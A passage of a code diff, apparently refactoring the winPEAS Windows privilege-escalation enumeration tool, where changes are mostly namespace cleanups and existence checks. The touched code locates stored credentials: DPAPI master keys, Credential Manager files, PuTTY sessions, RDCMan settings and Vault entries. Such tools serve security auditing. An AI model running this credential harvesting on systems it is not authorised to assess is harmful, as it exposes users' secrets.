                                            if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
                                            {
-                                                DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
-                                                DateTime lastModified = System.IO.File.GetLastWriteTime(file);
-                                                string fileName = System.IO.Path.GetFileName(file);
+                                                DateTime lastAccessed = File.GetLastAccessTime(file);
+                                                DateTime lastModified = File.GetLastWriteTime(file);
+                                                string fileName = Path.GetFileName(file);
                                                results.Add(new Dictionary<string, string>()
                                                {
                                                    { "MasterKey", file },
@@ -274,13 +281,15 @@ namespace winPEAS.KnownFileCreds
                else
                {
                    string userName = Environment.GetEnvironmentVariable("USERNAME");
-                    List<string> userDPAPIBasePaths = new List<string>();
-                    userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
-                    userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                    List<string> userDPAPIBasePaths = new List<string>
+                    {
+                        string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE")),
+                        string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE"))
+                    };

                    foreach (string userDPAPIBasePath in userDPAPIBasePaths)
                    {
-                        if (System.IO.Directory.Exists(userDPAPIBasePath))
+                        if (Directory.Exists(userDPAPIBasePath))
                        {
                            var directories = Directory.EnumerateDirectories(userDPAPIBasePath);
                            foreach (string directory in directories)
@@ -291,9 +300,9 @@ namespace winPEAS.KnownFileCreds
                                {
                                    if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
                                    {
-                                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
-                                        DateTime lastModified = System.IO.File.GetLastWriteTime(file);
-                                        string fileName = System.IO.Path.GetFileName(file);
+                                        DateTime lastAccessed = File.GetLastAccessTime(file);
+                                        DateTime lastModified = File.GetLastWriteTime(file);
+                                        string fileName = Path.GetFileName(file);
                                        results.Add(new Dictionary<string, string>()
                                    {
                                        { "MasterKey", file },
@@ -331,23 +340,25 @@ namespace winPEAS.KnownFileCreds
                        string userName = parts[parts.Length - 1];
                        if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                        {
-                            List<string> userCredFilePaths = new List<string>();
-                            userCredFilePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir));
-                            userCredFilePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir));
+                            List<string> userCredFilePaths = new List<string>
+                            {
+                                string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir),
+                                string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir)
+                            };

                            foreach (string userCredFilePath in userCredFilePaths)
                            {
-                                if (System.IO.Directory.Exists(userCredFilePath))
+                                if (Directory.Exists(userCredFilePath))
                                {
                                    var systemFiles = Directory.EnumerateFiles(userCredFilePath);
                                    if ((systemFiles != null))
                                    {
                                        foreach (string file in systemFiles)
                                        {
-                                            DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
-                                            DateTime lastModified = System.IO.File.GetLastWriteTime(file);
-                                            long size = new System.IO.FileInfo(file).Length;
-                                            string fileName = System.IO.Path.GetFileName(file);
+                                            DateTime lastAccessed = File.GetLastAccessTime(file);
+                                            DateTime lastModified = File.GetLastWriteTime(file);
+                                            long size = new FileInfo(file).Length;
+                                            string fileName = Path.GetFileName(file);

                                            // jankily parse the bytes to extract the credential type and master key GUID
                                            // reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
@@ -381,15 +392,17 @@ namespace winPEAS.KnownFileCreds
                    }

                    string systemFolder = string.Format("{0}\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials", Environment.GetEnvironmentVariable("SystemRoot"));
+                    if (Directory.Exists(systemFolder))
+                    {
                        var files = Directory.EnumerateFiles(systemFolder);
                        if ((files != null))
                        {
                            foreach (string file in files)
                            {
-                            DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
-                            DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                DateTime lastAccessed = File.GetLastAccessTime(file);
+                                DateTime lastModified = File.GetLastWriteTime(file);
                                long size = new System.IO.FileInfo(file).Length;
-                            string fileName = System.IO.Path.GetFileName(file);
+                                string fileName = Path.GetFileName(file);

                                // jankily parse the bytes to extract the credential type and master key GUID
                                // reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
@@ -418,12 +431,15 @@ namespace winPEAS.KnownFileCreds
                            }
                        }
                    }
+                }
                else
                {
                    string userName = Environment.GetEnvironmentVariable("USERNAME");
-                    List<string> userCredFilePaths = new List<string>();
-                    userCredFilePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
-                    userCredFilePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                    List<string> userCredFilePaths = new List<string>
+                    {
+                        string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", Environment.GetEnvironmentVariable("USERPROFILE")),
+                        string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", Environment.GetEnvironmentVariable("USERPROFILE"))
+                    };

                    foreach (string userCredFilePath in userCredFilePaths)
                    {
@@ -433,10 +449,10 @@ namespace winPEAS.KnownFileCreds

                            foreach (string file in files)
                            {
-                                DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
-                                DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                DateTime lastAccessed = File.GetLastAccessTime(file);
+                                DateTime lastModified = File.GetLastWriteTime(file);
                                long size = new System.IO.FileInfo(file).Length;
-                                string fileName = System.IO.Path.GetFileName(file);
+                                string fileName = Path.GetFileName(file);

                                // jankily parse the bytes to extract the credential type and master key GUID
                                // reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Putty.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Putty.cs
@@ -1,6 +1,6 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;

@@ -20,7 +20,7 @@ namespace winPEAS.KnownFileCreds
            try
            {
                Beaprint.MainPrint("Putty Sessions");
-                List<Dictionary<string, string>> putty_sess = Putty.GetPuttySessions();
+                List<Dictionary<string, string>> putty_sess = GetPuttySessions();

                Dictionary<string, string> colorF = new Dictionary<string, string>()
                        {
@@ -39,7 +39,7 @@ namespace winPEAS.KnownFileCreds
            try
            {
                Beaprint.MainPrint("Putty SSH Host keys");
-                List<Dictionary<string, string>> putty_sess = Putty.ListPuttySSHHostKeys();
+                List<Dictionary<string, string>> putty_sess = ListPuttySSHHostKeys();
                Dictionary<string, string> colorF = new Dictionary<string, string>()
                        {
                            { ".*", Beaprint.ansi_color_bad },
@@ -182,8 +182,10 @@ namespace winPEAS.KnownFileCreds
                        Dictionary<string, object> hostKeys = RegistryHelper.GetRegValues("HKU", string.Format("{0}\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\", SID));
                        if ((hostKeys != null) && (hostKeys.Count != 0))
                        {
-                            Dictionary<string, string> putty_ssh = new Dictionary<string, string>();
-                            putty_ssh["UserSID"] = SID;
+                            Dictionary<string, string> putty_ssh = new Dictionary<string, string>
+                            {
+                                ["UserSID"] = SID
+                            };
                            foreach (KeyValuePair<string, object> kvp in hostKeys)
                            {
                                putty_ssh[kvp.Key] = ""; //Looks like only matters the key name, not the value
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/RemoteDesktop.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/RemoteDesktop.cs
@@ -1,8 +1,8 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Xml;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;

@@ -77,7 +77,7 @@ namespace winPEAS.KnownFileCreds
                        if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                        {
                            string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", dir);
-                            if (System.IO.File.Exists(userRDManFile))
+                            if (File.Exists(userRDManFile))
                            {
                                XmlDocument xmlDoc = new XmlDocument();
                                xmlDoc.Load(userRDManFile);
@@ -87,8 +87,8 @@ namespace winPEAS.KnownFileCreds
                                XmlNodeList items = filesToOpen[0].ChildNodes;
                                XmlNode node = items[0];

-                                DateTime lastAccessed = System.IO.File.GetLastAccessTime(userRDManFile);
-                                DateTime lastModified = System.IO.File.GetLastWriteTime(userRDManFile);
+                                DateTime lastAccessed = File.GetLastAccessTime(userRDManFile);
+                                DateTime lastModified = File.GetLastWriteTime(userRDManFile);
                                Dictionary<string, string> rdg = new Dictionary<string, string>(){
                                    { "RDCManFile", userRDManFile },
                                    { "Accessed", string.Format("{0}", lastAccessed) },
@@ -107,9 +107,9 @@ namespace winPEAS.KnownFileCreds
                else
                {
                    string userName = Environment.GetEnvironmentVariable("USERNAME");
-                    string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", System.Environment.GetEnvironmentVariable("USERPROFILE"));
+                    string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", Environment.GetEnvironmentVariable("USERPROFILE"));

-                    if (System.IO.File.Exists(userRDManFile))
+                    if (File.Exists(userRDManFile))
                    {
                        XmlDocument xmlDoc = new XmlDocument();
                        xmlDoc.Load(userRDManFile);
@@ -119,8 +119,8 @@ namespace winPEAS.KnownFileCreds
                        XmlNodeList items = filesToOpen[0].ChildNodes;
                        XmlNode node = items[0];

-                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(userRDManFile);
-                        DateTime lastModified = System.IO.File.GetLastWriteTime(userRDManFile);
+                        DateTime lastAccessed = File.GetLastAccessTime(userRDManFile);
+                        DateTime lastModified = File.GetLastWriteTime(userRDManFile);
                        Dictionary<string, string> rdg = new Dictionary<string, string>(){
                                    { "RDCManFile", userRDManFile },
                                    { "Accessed", string.Format("{0}", lastAccessed) },
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/SuperPutty/SuperPutty.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/SuperPutty/SuperPutty.cs
@@ -24,6 +24,8 @@ namespace winPEAS.KnownFileCreds.SuperPutty
                try
                {
                    var path = $"{dir}\\Documents\\SuperPuTTY\\";
+                    if (Directory.Exists(path))
+                    {
                        var files = Directory.EnumerateFiles(path, filter, SearchOption.TopDirectoryOnly);

                        foreach (var file in files)
@@ -31,6 +33,7 @@ namespace winPEAS.KnownFileCreds.SuperPutty
                            Beaprint.BadPrint($"     {file}");
                        }
                    }
+                }
                catch (Exception)
                {
                }
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Vault/VaultCli.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Vault/VaultCli.cs
@@ -45,16 +45,18 @@ namespace winPEAS.KnownFileCreds.Vault

                // Create dictionary to translate Guids to human readable elements
                IntPtr guidAddress = vaultGuidPtr;
-                Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>();
-                vaultSchema.Add(new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note");
-                vaultSchema.Add(new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential");
-                vaultSchema.Add(new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector");
-                vaultSchema.Add(new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials");
-                vaultSchema.Add(new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials");
-                vaultSchema.Add(new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential");
-                vaultSchema.Add(new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential");
-                vaultSchema.Add(new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential");
-                vaultSchema.Add(new Guid("00000000-0000-0000-0000-000000000000"), null);
+                Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>
+                {
+                    { new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note" },
+                    { new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential" },
+                    { new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector" },
+                    { new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials" },
+                    { new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials" },
+                    { new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential" },
+                    { new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential" },
+                    { new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential" },
+                    { new Guid("00000000-0000-0000-0000-000000000000"), null }
+                };

                for (int i = 0; i < vaultCount; i++)
                {
@@ -167,7 +169,7 @@ namespace winPEAS.KnownFileCreds.Vault
                                    vault_cred["PacakgeSid"] = string.Format("{0}", packageSid);
                                }
                                vault_cred["Credential"] = string.Format("{0}", cred);
-                                vault_cred["Last Modified"] = string.Format("{0}", System.DateTime.FromFileTimeUtc((long)lastModified));
+                                vault_cred["Last Modified"] = string.Format("{0}", DateTime.FromFileTimeUtc((long)lastModified));
                                results.Add(vault_cred);
                            }
                        }
--- a/winPEAS/winPEASexe/winPEAS/Native/Classes/SafeTokenHandle.cs
+++ b/winPEAS/winPEASexe/winPEAS/Native/Classes/SafeTokenHandle.cs
@@ -1,7 +1,6 @@
 using System;
 using System.Runtime.InteropServices;
 using winPEAS.Native.Enums;
-using winPEAS.TaskScheduler.TaskEditor.Native;

 namespace winPEAS.Native.Classes
 {
--- a/winPEAS/winPEASexe/winPEAS/Native/Ntdll.cs
+++ b/winPEAS/winPEASexe/winPEAS/Native/Ntdll.cs
@@ -1,7 +1,5 @@
 using System;
-using System.Runtime.ConstrainedExecution;
 using System.Runtime.InteropServices;
-using winPEAS.Info.SystemInfo.NamedPipes;

 namespace winPEAS.Native
 {
--- a/winPEAS/winPEASexe/winPEAS/Properties/AssemblyInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Properties/AssemblyInfo.cs
@@ -1,5 +1,4 @@
 using System.Reflection;
-using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;

 // General Information about an assembly is controlled through the following
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/AccessControlExtension.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/AccessControlExtension.cs
@@ -2,8 +2,6 @@
 using System.Collections.Generic;
 using System.Linq;
 using System.Security.AccessControl;
-using System.Text;
-using System.Threading.Tasks;

 namespace winPEAS.TaskScheduler
 {
@@ -20,7 +18,7 @@ namespace winPEAS.TaskScheduler
            var aces = new System.Collections.Generic.List<GenericAce>(acl.Cast<GenericAce>());

            // Sort aces based on canonical order
-			aces.Sort((a, b) => System.Collections.Generic.Comparer<byte>.Default.Compare(GetComparisonValue(a), GetComparisonValue(b)));
+            aces.Sort((a, b) => Comparer<byte>.Default.Compare(GetComparisonValue(a), GetComparisonValue(b)));

            // Add sorted aces back to ACL
            while (acl.Count > 0) acl.RemoveAce(0);
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/Action.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/Action.cs
@@ -1,10 +1,10 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Xml.Serialization;
-using Microsoft.Win32;
 using winPEAS.TaskScheduler.V1;
 using winPEAS.TaskScheduler.V2;

--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/ActionCollection.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/ActionCollection.cs
@@ -3,11 +3,8 @@ using System.Collections;
 using System.Collections.Generic;
 using System.Collections.Specialized;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;
 using System.Xml.Serialization;
 using winPEAS.TaskScheduler.TaskEditor.Native;
 using winPEAS.TaskScheduler.V1;
@@ -706,7 +703,7 @@ namespace winPEAS.TaskScheduler
                        }
                    }
                    else
-						ret.Add(Action.ExecAction.ConvertFromPowerShellAction(exec));
+                        ret.Add(Action.ConvertFromPowerShellAction(exec));
                }
                else if (!string.IsNullOrEmpty(exec.Path))
                {
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/CultureSwitcher.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/CultureSwitcher.cs
@@ -1,9 +1,5 @@
 using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
 using System.Threading;
-using System.Threading.Tasks;

 namespace winPEAS.TaskScheduler
 {
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/EnumUtil.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/EnumUtil.cs
@@ -1,9 +1,6 @@
 using System;
 using System.Collections.Generic;
 using System.ComponentModel;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;

 namespace winPEAS.TaskScheduler
 {
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/JetBrains.Annotations.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/JetBrains.Annotations.cs
@@ -1,8 +1,4 @@
 using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;

 namespace winPEAS.TaskScheduler
 {
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/NamedValueCollection.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/NamedValueCollection.cs
@@ -2,10 +2,7 @@
 using System.Collections.Generic;
 using System.Collections.Specialized;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;
 using System.Xml.Serialization;
 using winPEAS.TaskScheduler.TaskEditor.Native;
 using winPEAS.TaskScheduler.V2;
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/NotV1SupportedException.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/NotV1SupportedException.cs
@@ -1,12 +1,8 @@
 using System;
-using System.Collections.Generic;
 using System.Diagnostics;
-using System.Linq;
 using System.Runtime.Serialization;
 using System.Security;
 using System.Security.Permissions;
-using System.Text;
-using System.Threading.Tasks;

 namespace winPEAS.TaskScheduler
 {
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/ReflectionHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/ReflectionHelper.cs
@@ -1,9 +1,5 @@
 using System;
-using System.Collections.Generic;
-using System.Linq;
 using System.Reflection;
-using System.Text;
-using System.Threading.Tasks;

 namespace winPEAS.TaskScheduler
 {
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEditor/Native/InteropUtil.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEditor/Native/InteropUtil.cs
@@ -1,10 +1,7 @@
 using System;
 using System.Collections;
 using System.Collections.Generic;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;

 namespace winPEAS.TaskScheduler.TaskEditor.Native
 {
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEditor/Native/NTDSAPI.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEditor/Native/NTDSAPI.cs
@@ -68,7 +68,7 @@ namespace winPEAS.TaskScheduler.TaskEditor.Native
            public string CrackName(string name)
            {
                var res = CrackNames(new string[] { name });
-				if (res == null || res.Length == 0 || res[0].status != NativeMethods.DS_NAME_ERROR.DS_NAME_NO_ERROR)
+                if (res == null || res.Length == 0 || res[0].status != DS_NAME_ERROR.DS_NAME_NO_ERROR)
                    throw new SecurityException("Unable to resolve user name.");
                return res[0].pName;
            }
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEditor/Native/NetServerEnum.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEditor/Native/NetServerEnum.cs
@@ -66,12 +66,12 @@ namespace winPEAS.TaskScheduler.TaskEditor.Native
        public struct NetworkComputerInfo // SERVER_INFO_101
        {
            ServerPlatform sv101_platform_id;
-			[MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
+            [MarshalAs(UnmanagedType.LPWStr)]
            string sv101_name;
            int sv101_version_major;
            int sv101_version_minor;
            ServerTypes sv101_type;
-			[MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
+            [MarshalAs(UnmanagedType.LPWStr)]
            string sv101_comment;

            public ServerPlatform Platform => sv101_platform_id;
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEvent.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEvent.cs
@@ -1,9 +1,6 @@
 using System;
 using System.Collections.Generic;
 using System.Diagnostics.Eventing.Reader;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;

 namespace winPEAS.TaskScheduler
 {
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskFolder.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskFolder.cs
@@ -1,13 +1,10 @@
 using System;
 using System.Collections.Generic;
 using System.IO;
-using System.Linq;
 using System.Runtime.InteropServices;
 using System.Security;
 using System.Security.AccessControl;
-using System.Text;
 using System.Text.RegularExpressions;
-using System.Threading.Tasks;
 using winPEAS.TaskScheduler.V1;
 using winPEAS.TaskScheduler.V2;

--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskFolderCollection.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskFolderCollection.cs
@@ -2,10 +2,7 @@
 using System.Collections.Generic;
 using System.Collections.Specialized;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.CompilerServices;
-using System.Text;
-using System.Threading.Tasks;
 using winPEAS.TaskScheduler.TaskEditor.Native;
 using winPEAS.TaskScheduler.V2;

--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskHandlerInterfaces.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskHandlerInterfaces.cs
@@ -1,9 +1,5 @@
 using System;
-using System.Collections.Generic;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;

 namespace winPEAS.TaskScheduler
 {
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskService.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskService.cs
@@ -2,10 +2,7 @@
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.IO;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;
 using winPEAS.TaskScheduler.V1;
 using winPEAS.TaskScheduler.V2;

@@ -718,7 +715,7 @@ namespace winPEAS.TaskScheduler
            }
            else
            {
-				taskPath = System.IO.Path.GetFileNameWithoutExtension(taskPath);
+                taskPath = Path.GetFileNameWithoutExtension(taskPath);
                var iTask = GetTask(v1TaskScheduler, taskPath);
                if (iTask != null)
                    t = new Task(this, iTask);
@@ -746,7 +743,7 @@ namespace winPEAS.TaskScheduler
        public TaskDefinition NewTaskFromFile([NotNull] string xmlFile)
        {
            var td = NewTask();
-			td.XmlText = System.IO.File.ReadAllText(xmlFile);
+            td.XmlText = File.ReadAllText(xmlFile);
            return td;
        }

--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/Trigger.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/Trigger.cs
@@ -2,11 +2,9 @@
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.Globalization;
-using System.Linq;
 using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;
 using System.Text;
-using System.Threading.Tasks;
 using System.Xml.Serialization;
 using winPEAS.Properties;
 using winPEAS.TaskScheduler.V1;
@@ -217,7 +215,7 @@ namespace winPEAS.TaskScheduler

        /// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
        /// <returns>String describing the trigger.</returns>
-		protected override string V2GetTriggerString() => Properties.Resources.TriggerBoot1;
+        protected override string V2GetTriggerString() => Resources.TriggerBoot1;
    }

    /// <summary>
@@ -419,8 +417,8 @@ namespace winPEAS.TaskScheduler
        /// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
        /// <returns>String describing the trigger.</returns>
        protected override string V2GetTriggerString() => DaysInterval == 1 ?
-			string.Format(Properties.Resources.TriggerDaily1, AdjustToLocal(StartBoundary)) :
-			string.Format(Properties.Resources.TriggerDaily2, AdjustToLocal(StartBoundary), DaysInterval);
+            string.Format(Resources.TriggerDaily1, AdjustToLocal(StartBoundary)) :
+            string.Format(Resources.TriggerDaily2, AdjustToLocal(StartBoundary), DaysInterval);

        private void ReadMyXml(System.Xml.XmlReader reader)
        {
@@ -633,13 +631,13 @@ namespace winPEAS.TaskScheduler
        protected override string V2GetTriggerString()
        {
            if (!GetBasic(out var log, out var source, out var id))
-				return Properties.Resources.TriggerEvent1;
+                return Resources.TriggerEvent1;
            var sb = new StringBuilder();
-			sb.AppendFormat(Properties.Resources.TriggerEventBasic1, log);
+            sb.AppendFormat(Resources.TriggerEventBasic1, log);
            if (!string.IsNullOrEmpty(source))
-				sb.AppendFormat(Properties.Resources.TriggerEventBasic2, source);
+                sb.AppendFormat(Resources.TriggerEventBasic2, source);
            if (id.HasValue)
-				sb.AppendFormat(Properties.Resources.TriggerEventBasic3, id.Value);
+                sb.AppendFormat(Resources.TriggerEventBasic3, id.Value);
            return sb.ToString();
        }
    }
@@ -674,7 +672,7 @@ namespace winPEAS.TaskScheduler

        /// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
        /// <returns>String describing the trigger.</returns>
-		protected override string V2GetTriggerString() => Properties.Resources.TriggerIdle1;
+        protected override string V2GetTriggerString() => Resources.TriggerIdle1;
    }

    /// <summary>
@@ -761,8 +759,8 @@ namespace winPEAS.TaskScheduler
        /// <returns>String describing the trigger.</returns>
        protected override string V2GetTriggerString()
        {
-			var user = string.IsNullOrEmpty(UserId) ? Properties.Resources.TriggerAnyUser : UserId;
-			return string.Format(Properties.Resources.TriggerLogon1, user);
+            var user = string.IsNullOrEmpty(UserId) ? Resources.TriggerAnyUser : UserId;
+            return string.Format(Resources.TriggerLogon1, user);
        }
    }

@@ -971,7 +969,7 @@ namespace winPEAS.TaskScheduler
            var ww = TaskEnumGlobalizer.GetString(WeeksOfMonth);
            var days = TaskEnumGlobalizer.GetString(DaysOfWeek);
            var months = TaskEnumGlobalizer.GetString(MonthsOfYear);
-			return string.Format(Properties.Resources.TriggerMonthlyDOW1, AdjustToLocal(StartBoundary), ww, days, months);
+            return string.Format(Resources.TriggerMonthlyDOW1, AdjustToLocal(StartBoundary), ww, days, months);
        }

        /// <summary>Reads the subclass XML for V1 streams.</summary>
@@ -1249,11 +1247,11 @@ namespace winPEAS.TaskScheduler
        /// <returns>String describing the trigger.</returns>
        protected override string V2GetTriggerString()
        {
-			var days = string.Join(Properties.Resources.ListSeparator, Array.ConvertAll(DaysOfMonth, i => i.ToString()));
+            var days = string.Join(Resources.ListSeparator, Array.ConvertAll(DaysOfMonth, i => i.ToString()));
            if (RunOnLastDayOfMonth)
-				days += (days.Length == 0 ? "" : Properties.Resources.ListSeparator) + Properties.Resources.WWLastWeek;
+                days += (days.Length == 0 ? "" : Resources.ListSeparator) + Resources.WWLastWeek;
            var months = TaskEnumGlobalizer.GetString(MonthsOfYear);
-			return string.Format(Properties.Resources.TriggerMonthly1, AdjustToLocal(StartBoundary), days, months);
+            return string.Format(Resources.TriggerMonthly1, AdjustToLocal(StartBoundary), days, months);
        }

        /// <summary>
@@ -1428,7 +1426,7 @@ namespace winPEAS.TaskScheduler

        /// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
        /// <returns>String describing the trigger.</returns>
-		protected override string V2GetTriggerString() => Properties.Resources.TriggerRegistration1;
+        protected override string V2GetTriggerString() => Resources.TriggerRegistration1;
    }

    /// <summary>Defines how often the task is run and how long the repetition pattern is repeated after the task is started.</summary>
@@ -1770,10 +1768,10 @@ namespace winPEAS.TaskScheduler
        /// <returns>String describing the trigger.</returns>
        protected override string V2GetTriggerString()
        {
-			var str = Properties.Resources.ResourceManager.GetString("TriggerSession" + StateChange.ToString());
